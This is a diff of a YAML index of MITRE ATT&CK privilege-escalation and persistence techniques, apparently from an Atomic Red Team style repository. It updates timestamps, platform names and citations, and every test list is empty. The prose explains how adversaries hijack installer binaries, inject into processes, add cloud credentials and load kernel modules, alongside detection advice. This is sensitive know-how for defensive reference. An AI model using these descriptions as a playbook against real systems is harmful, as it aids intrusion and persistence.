-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574.005:
     technique:
@@ -18983,7 +19291,7 @@ privilege-escalation:
         description: 'Stefan Kanthak. (2015, December 8). Executable installers are
           vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
           of privilege. Retrieved December 4, 2014.'
-      modified: '2020-10-27T14:49:39.188Z'
+      modified: '2020-03-26T19:20:23.030Z'
       name: Executable Installer File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -19018,12 +19326,10 @@ privilege-escalation:
       - Administrator
       - User
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1546.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:33:18.602Z'
       name: 'Event Triggered Execution: Accessibility Features'
       description: |-
         Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
@@ -19100,7 +19406,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.008
     atomic_tests: []
   T1055.004:
@@ -19139,7 +19444,7 @@ privilege-escalation:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:23:46.476Z'
       name: 'Process Injection: Asynchronous Procedure Call'
       description: "Adversaries may inject malicious code into processes via the asynchronous
         procedure call (APC) queue in order to evade process-based defenses as well
@@ -19188,8 +19493,6 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Application control
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.004
     atomic_tests: []
   T1546.009:
@@ -19221,7 +19524,7 @@ privilege-escalation:
         description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls.
           Retrieved December 18, 2017.
         source_name: Sysinternals AppCertDlls Oct 2007
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.052Z'
       name: 'Event Triggered Execution: AppCert DLLs'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by AppCert DLLs loaded into processes.
@@ -19269,13 +19572,11 @@ privilege-escalation:
       x_mitre_effective_permissions:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.009
     atomic_tests: []
   T1098.005:
     technique:
-      modified: '2023-10-03T17:38:39.065Z'
+      modified: '2024-09-25T20:39:53.597Z'
       name: Device Registration
       description: "Adversaries may register a device to an adversary-controlled account.
         Devices may be registered in a multifactor authentication (MFA) system, which
@@ -19288,16 +19589,16 @@ privilege-escalation:
         FireEye SolarWinds) In some cases, the MFA self-enrollment process may require
         only a username and password to enroll the account's first device or to enroll
         a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly,
-        an adversary with existing access to a network may register a device to Azure
-        AD and/or its device management system, Microsoft Intune, in order to access
+        an adversary with existing access to a network may register a device to Entra
+        ID and/or its device management system, Microsoft Intune, in order to access
         sensitive data or resources while bypassing conditional access policies.(Citation:
         AADInternals - Device Registration)(Citation: AADInternals - Conditional Access
-        Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may
+        Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Entra ID may
         be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)
         campaigns via intra-organizational emails, which are less likely to be treated
         as suspicious by the email client.(Citation: Microsoft - Device Registration)
         Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)
-        on an Azure AD tenant by registering a large number of devices.(Citation:
+        on an Entra ID tenant by registering a large number of devices.(Citation:
         AADInternals - BPRT)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -19309,16 +19610,16 @@ privilege-escalation:
       - Mike Moran
       - Joe Gumke, U.S. Bank
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
       - Windows
-      - SaaS
-      x_mitre_version: '1.2'
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Active Directory: Active Directory Object Creation'
@@ -19373,7 +19674,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.002:
     technique:
@@ -19396,7 +19696,7 @@ privilege-escalation:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:21:11.178Z'
       name: 'Process Injection: Portable Executable Injection'
       description: "Adversaries may inject portable executables (PE) into processes
         in order to evade process-based defenses as well as possibly elevate privileges.
@@ -19440,8 +19740,6 @@ privilege-escalation:
       - Application control
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.002
     atomic_tests: []
   T1547.015:
@@ -19518,7 +19816,7 @@ privilege-escalation:
         url: https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1
         description: Apple. (2018, June 4). Launch Services Keys. Retrieved October
           5, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T16:36:37.042Z'
       name: 'Boot or Logon Autostart Execution: Login Items'
       description: |-
         Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call <code>SMLoginItemSetEnabled</code>.
@@ -19546,8 +19844,6 @@ privilege-escalation:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1547.015
     atomic_tests: []
   T1134.001:
@@ -19606,23 +19902,22 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.001
     atomic_tests: []
   T1098.001:
     technique:
-      modified: '2024-02-28T14:35:00.862Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Account Manipulation: Additional Cloud Credentials'
       description: "Adversaries may add adversary-controlled credentials to a cloud
         account to maintain persistent access to victim accounts and instances within
         the environment.\n\nFor example, adversaries may add credentials for Service
         Principals and Applications in addition to existing legitimate credentials
-        in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue
-        Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include
-        both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance)
-        With sufficient permissions, there are a variety of ways to add credentials
-        including the Azure Portal, Azure command line interface, and Azure or Az
-        PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
+        in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation:
+        Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials
+        include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer
+        Guidance) With sufficient permissions, there are a variety of ways to add
+        credentials including the Azure Portal, Azure command line interface, and
+        Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
         infrastructure-as-a-service (IaaS) environments, after gaining access through
         [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries
         may generate or import their own SSH keys using either the <code>CreateKeyPair</code>
@@ -19632,11 +19927,15 @@ privilege-escalation:
         usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation:
         Expel Behind the Scenes)\n\nAdversaries may also use the <code>CreateAccessKey</code>
         API in AWS or the <code>gcloud iam service-accounts keys create</code> command
-        in GCP to add access keys to an account. If the target account has different
-        permissions from the requesting account, the adversary may also be able to
-        escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
+        in GCP to add access keys to an account. Alternatively, they may use the <code>CreateLoginProfile</code>
+        API in AWS to add a password that can be used to log into the AWS Management
+        Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation:
+        Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024)
+        If the target account has different permissions from the requesting account,
+        the adversary may also be able to escalate their privileges in the environment
+        (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
         Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel
-        2.0) For example, in Azure AD environments, an adversary with the Application
+        2.0) For example, in Entra ID environments, an adversary with the Application
         Administrator role can add a new set of credentials to their application's
         service principal. In doing so the adversary would be able to access the service
         principal’s roles and permissions, which may be different from those of the
@@ -19647,12 +19946,19 @@ privilege-escalation:
         tied to the permissions of the original user account. These temporary credentials
         may remain valid for the duration of their lifetime even if the original account’s
         API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation
-        Persistence)"
+        Persistence)\n\nIn Entra ID environments with the app password feature enabled,
+        adversaries may be able to add an app password to a user account.(Citation:
+        Mandiant APT42 Operations 2024) As app passwords are intended to be used with
+        legacy devices that do not support multi-factor authentication (MFA), adding
+        an app password can allow an adversary to bypass MFA requirements. Additionally,
+        app passwords may remain valid even if the user’s primary password is reset.(Citation:
+        Microsoft Entra ID App Passwords)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Expel
       - Oleg Kolesnikov, Securonix
@@ -19661,6 +19967,7 @@ privilege-escalation:
       - Alex Soler, AttackIQ
       - Dylan Silva, AWS Security
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
@@ -19669,13 +19976,16 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - IaaS
-      - Azure AD
       - SaaS
-      x_mitre_version: '2.7'
+      - Identity Provider
+      x_mitre_version: '2.8'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
+      - 'Active Directory: Active Directory Object Creation'
+      - 'Active Directory: Active Directory Object Modification'
       type: attack-pattern
       id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd
       created: '2020-01-19T16:10:15.008Z'
@@ -19701,10 +20011,18 @@ privilege-escalation:
         description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service
           Principals. Retrieved January 19, 2020.
         url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
+      - source_name: Lacework AI Resource Hijacking 2024
+        description: Detecting AI resource-hijacking with Composite Alerts. (2024,
+          June 6). Lacework Labs. Retrieved July 1, 2024.
+        url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
       - source_name: GCP SSH Key Add
         description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved
           October 1, 2020.
         url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
+      - source_name: Permiso Scattered Spider 2023
+        description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+          SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+        url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
       - source_name: Blue Cloud of Death Video
         description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming
           Azure. Retrieved November 21, 2019.'
@@ -19713,10 +20031,20 @@ privilege-escalation:
         description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming
           Azure. Retrieved October 23, 2019.'
         url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
+      - source_name: Microsoft Entra ID App Passwords
+        description: Microsoft. (2023, October 23). Enforce Microsoft Entra multifactor
+          authentication with legacy applications using app passwords. Retrieved May
+          28, 2024.
+        url: https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords
       - source_name: Microsoft SolarWinds Customer Guidance
         description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
           Cyber Attacks. Retrieved December 17, 2020.
         url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
+      - source_name: Mandiant APT42 Operations 2024
+        description: 'Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, and
+          Jonathan Leathery. (2024, May 1). Uncharmed: Untangling Iran''s APT42 Operations.
+          Retrieved May 28, 2024.'
+        url: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
       - source_name: Expel Behind the Scenes
         description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020,
           July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved
@@ -19733,9 +20061,6 @@ privilege-escalation:
         url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.001
     atomic_tests: []
   T1134.003:
@@ -19799,7 +20124,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.003:
     technique:
@@ -19888,7 +20212,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.003
     atomic_tests: []
   T1134.004:
@@ -19946,7 +20269,7 @@ privilege-escalation:
         Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be <code>explorer.exe</code> rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
 
         Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as <code>lsass.exe</code>), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-03T02:15:42.360Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Access Token Manipulation: Parent PID Spoofing'
       x_mitre_detection: |-
@@ -19971,12 +20294,11 @@ privilege-escalation:
       - Host Forensic Analysis
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.004
     atomic_tests: []
   T1546.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:27:11.065Z'
       name: 'Event Triggered Execution: Change Default File Association'
       description: "Adversaries may establish persistence by executing malicious content
         triggered by a file type association. When a file is opened, the default program
@@ -20002,7 +20324,6 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: persistence
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Stefan Kanthak
@@ -20016,7 +20337,6 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -20043,8 +20363,8 @@ privilege-escalation:
         url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
       - source_name: Microsoft File Handlers
         description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions.
-          Retrieved November 13, 2014.
-        url: http://msdn.microsoft.com/en-us/library/bb166549.aspx
+          Retrieved September 12, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2015/extensibility/specifying-file-handlers-for-file-name-extensions?view=vs-2015
       - source_name: Microsoft Assoc Oct 2017
         description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August
           7, 2018.
@@ -20055,7 +20375,8 @@ privilege-escalation:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1546.001
     atomic_tests: []
   T1055.014:
@@ -20126,7 +20447,7 @@ privilege-escalation:
         resources, and possibly elevated privileges. Execution via VDSO hijacking
         may also evade detection from security products since the execution is masked
         under a legitimate process.  "
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-07T17:09:09.048Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: VDSO Hijacking
       x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
@@ -20153,7 +20474,6 @@ privilege-escalation:
       - Application control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.014:
     technique:
@@ -20193,7 +20513,7 @@ privilege-escalation:
         The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path <code>/private/var/db/emondClients</code>, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at<code>/System/Library/LaunchDaemons/com.apple.emond.plist</code>.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
 
         Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T00:16:01.732Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Event Triggered Execution: Emond'
       x_mitre_detection: Monitor emond rules creation by checking for files created
@@ -20213,12 +20533,11 @@ privilege-escalation:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.014
     atomic_tests: []
   T1574.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:37.026Z'
       name: Services File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -20272,11 +20591,10 @@ privilege-escalation:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1547.001:
     technique:
-      modified: '2023-10-16T09:08:22.319Z'
+      modified: '2024-09-12T15:27:58.051Z'
       name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
       description: |-
         Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -20363,9 +20681,9 @@ privilege-escalation:
           in the Registry. Retrieved August 3, 2020.
         url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
       - source_name: Microsoft Run Key
-        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa376977
+        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
       - source_name: Oddvar Moe RunOnceEx Mar 2018
         description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden
           from Autoruns.exe. Retrieved June 29, 2018.
@@ -20378,12 +20696,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.001
     atomic_tests: []
   T1098:
     technique:
-      modified: '2024-01-16T22:24:38.234Z'
+      modified: '2024-10-15T15:35:57.382Z'
       name: Account Manipulation
       description: "Adversaries may manipulate accounts to maintain and/or elevate
         access to victim systems. Account manipulation may consist of any action that
@@ -20419,16 +20736,15 @@ privilege-escalation:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - SaaS
       - Network
       - Containers
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
@@ -20469,143 +20785,141 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098
     atomic_tests: []
   T1547.006:
     technique:
-      x_mitre_platforms:
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-09-12T17:30:54.170Z'
+      name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
+      description: |-
+        Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) 
+
+        When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
+
+        Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
+
+        Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
+
+        Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
       x_mitre_contributors:
       - Wayne Silva, F-Secure Countercept
       - Anastasios Pingios
       - Jeremy Galloway
       - Red Canary
       - Eric Kaiser @ideologysec
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_deprecated: false
+      x_mitre_detection: |
+        Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: <code>modprobe</code>, <code>insmod</code>, <code>lsmod</code>, <code>rmmod</code>, or <code>modinfo</code> (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into <code>/lib/modules</code> and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
+
+        Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: <code>apt-get install linux-headers-$(uname -r)</code> On RHEL and CentOS based systems this can be accomplished by running: <code>yum install kernel-devel-$(uname -r)</code>
+
+        On macOS, monitor for execution of <code>kextload</code> commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the <code>kext_policy</code> table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, <code>/var/db/SystemPolicyConfiguration/KextPolicy</code>.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      - Linux
+      x_mitre_version: '1.3'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'File: File Creation'
+      - 'File: File Modification'
+      - 'Kernel: Kernel Module Load'
+      - 'Process: Process Creation'
+      x_mitre_permissions_required:
+      - root
       type: attack-pattern
       id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
       created: '2020-01-24T17:42:23.339Z'
-      x_mitre_version: '1.3'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1547.006
         url: https://attack.mitre.org/techniques/T1547/006
+        external_id: T1547.006
       - source_name: Apple Developer Configuration Profile
-        url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
         description: Apple. (2019, May 3). Configuration Profile Reference. Retrieved
           September 23, 2021.
+        url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
       - source_name: Apple Kernel Extension Deprecation
-        url: https://developer.apple.com/support/kernel-extensions/
         description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension
           Alternatives. Retrieved November 4, 2020.
+        url: https://developer.apple.com/support/kernel-extensions/
